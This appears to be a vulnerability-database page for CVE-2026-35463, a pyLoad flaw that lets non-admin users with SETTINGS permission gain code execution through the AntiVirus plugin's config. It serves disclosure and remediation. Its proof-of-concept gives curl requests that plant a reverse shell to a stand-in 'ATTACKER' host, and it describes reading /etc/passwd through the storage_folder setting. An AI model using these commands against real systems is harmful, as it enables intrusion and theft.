Python
CVE-2026-35463
HIGH
Severity by source
AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Lifecycle Timeline
3DescriptionGitHub Advisory
Summary
The ADMIN_ONLY_OPTIONS protection mechanism restricts security-critical configuration values (reconnect scripts, SSL certs, proxy credentials) to admin-only access. However, this protection is only applied to core config options, not to plugin config options. The AntiVirus plugin stores an executable path (avfile) in its config, which is passed directly to subprocess.Popen(). A non-admin user with SETTINGS permission can change this path to achieve remote code execution.
Details
Safe wrapper - ADMIN_ONLY_OPTIONS (core/api/__init__.py:225-235):
ADMIN_ONLY_OPTIONS = {
"reconnect.script",
# Blocks script path change
"webui.host",
# Blocks bind address change
"ssl.cert_file",
# Blocks cert path change
"ssl.key_file",
# Blocks key path change
# ... other sensitive options
}Where it IS enforced - core config (core/api/__init__.py:255):
def set_config_value(self, section, option, value):
if f"{section}.{option}" in ADMIN_ONLY_OPTIONS:
if not self.user.is_admin:
raise PermissionError("Admin only")
# ...Where it is NOT enforced - plugin config (core/api/__init__.py:271-272):
# Plugin config - NO admin check at all
self.pyload.config.set_plugin(category, option, value)Dangerous sink - AntiVirus plugin (plugins/addons/AntiVirus.py:75):
def scan_file(self, file):
avfile = self.config.get("avfile")
# User-controlled via plugin config
avargs = self.config.get("avargs")
subprocess.Popen([avfile, avargs, target])
# RCEPoC
# As non-admin user with SETTINGS permission:
# 1. Set AntiVirus executable to a reverse shell
curl -b session_cookie -X POST http://TARGET:8000/api/set_config_value \
-d 'section=plugin' \
-d 'option=AntiVirus.avfile' \
-d 'value=/bin/bash'
curl -b session_cookie -X POST http://TARGET:8000/api/set_config_value \
-d 'section=plugin' \
-d 'option=AntiVirus.avargs' \
-d 'value=-c "bash -i >& /dev/tcp/ATTACKER/4444 0>&1"'
# 2. Enable the AntiVirus plugin
curl -b session_cookie -X POST http://TARGET:8000/api/set_config_value \
-d 'section=plugin' \
-d 'option=AntiVirus.activated' \
-d 'value=True'
# 3. Add a download - when it completes, AntiVirus.scan_file() runs the payload
curl -b session_cookie -X POST http://TARGET:8000/api/add_package \
-d 'name=test' \
-d 'links=http://example.com/test.zip'
# Result: reverse shell as the pyload process userAdditional Finding: Arbitrary File Read via storage_folder
The storage_folder validation at core/api/__init__.py:238-246 uses inverted logic - it prevents the new value from being INSIDE protected directories, but not from being an ANCESTOR of everything. Setting storage_folder=/ combined with GET /files/get/etc/passwd gives arbitrary file read to non-admin users with SETTINGS+DOWNLOAD permissions.
Impact
- Remote Code Execution - Non-admin user can execute arbitrary commands via AntiVirus plugin config
- Privilege escalation - SETTINGS permission (non-admin) escalates to full system access
- Arbitrary file read - Via storage_folder manipulation
Remediation
Apply ADMIN_ONLY_OPTIONS to plugin config as well:
# In set_config_value():
ADMIN_ONLY_PLUGIN_OPTIONS = {
"AntiVirus.avfile",
"AntiVirus.avargs",
# ... any plugin option that controls executables or paths
}
if section == "plugin" and option in ADMIN_ONLY_PLUGIN_OPTIONS:
if not self.user.is_admin:
raise PermissionError("Admin only")Or better: validate that avfile points to a known AV binary before passing to subprocess.Popen().
AnalysisAI
Remote code execution in pyLoad download manager allows authenticated non-admin users with SETTINGS permission to execute arbitrary system commands via the AntiVirus plugin configuration. The vulnerability stems from incomplete enforcement of admin-only security controls: while core configuration options like reconnect scripts and SSL certificates require admin privileges, plugin configuration lacks this protection. Attackers can modify the AntiVirus plugin's executable path (avfile) parameter, which is directly passed to subprocess.Popen() without validation, achieving command execution when file downloads complete. CVSS 8.8 reflects network-accessible attack with low complexity requiring only low-privilege authentication. No active exploitation confirmed (not in CISA KEV), but detailed proof-of-concept exists in the GitHub security advisory.
Technical ContextAI
pyLoad (pkg:pip/pyload-ng) is a Python-based download manager with plugin architecture. The application implements ADMIN_ONLY_OPTIONS controls to restrict security-critical core configuration values (reconnect scripts, SSL certificates, proxy credentials) to admin users. However, this protection mechanism only validates core config options at core/api/__init__.py:255, while plugin config modifications at line 271-272 bypass this check entirely. The AntiVirus plugin (plugins/addons/AntiVirus.py:75) retrieves the 'avfile' and 'avargs' configuration values and passes them directly to subprocess.Popen() without sanitization or path validation. This represents a classic OS Command Injection vulnerability (CWE-78) where user-controlled input flows into a command execution sink. The vulnerability also includes an arbitrary file read component via storage_folder path traversal using inverted validation logic that prevents child paths but allows parent directory access.
RemediationAI
Apply vendor-released patch from the pyLoad project available through the GitHub security advisory at https://github.com/pyload/pyload/security/advisories/GHSA-w48f-wwwf-f5fr. The recommended fix extends ADMIN_ONLY_OPTIONS enforcement to plugin configuration by creating an ADMIN_ONLY_PLUGIN_OPTIONS set containing sensitive plugin options like AntiVirus.avfile and AntiVirus.avargs, then validating these before applying plugin config changes. A more robust solution involves whitelisting known antivirus binary paths and validating avfile points to legitimate executables before passing to subprocess.Popen(). As immediate mitigation, restrict SETTINGS permission to admin users only, disable the AntiVirus plugin if not required, or implement filesystem-level restrictions preventing the pyLoad process from executing arbitrary binaries. Organizations should audit which non-admin users have SETTINGS permissions and review plugin configurations for unauthorized modifications.
Wazuh SIEM platform versions 4.4.0 through 4.9.0 contain an unsafe deserialization vulnerability in the DistributedAPI t
BentoML version 1.4.2 and earlier contains an unauthenticated remote code execution vulnerability through insecure deser
pgAdmin 4 contains critical remote code execution vulnerabilities in the Query Tool download and Cloud Deployment endpoi
The renderLocalView function in render/views.py in graphite-web in Graphite 0.9.5 through 0.9.10 uses the pickle Python
BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Rated critica
OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCiph
pyLoad download manager version prior to 0.5.0b3.dev77 exposes the Flask SECRET_KEY through an unauthenticated endpoint.
In Mercurial before 4.1.3, "hg serve --stdio" allows remote authenticated users to launch the Python debugger, and conse
Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/
pyLoad is the free and open-source Download Manager written in pure Python. Rated medium severity (CVSS 5.3), this vulne
Langflow (a visual LLM pipeline builder) contains a critical unauthenticated code execution vulnerability (CVE-2026-3301
Cross-user flow execution in Langflow (< 1.9.1) lets any authenticated API-key holder run another user's flow by passing
Same weakness CWE-78 – OS Command Injection
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-w48f-wwwf-f5fr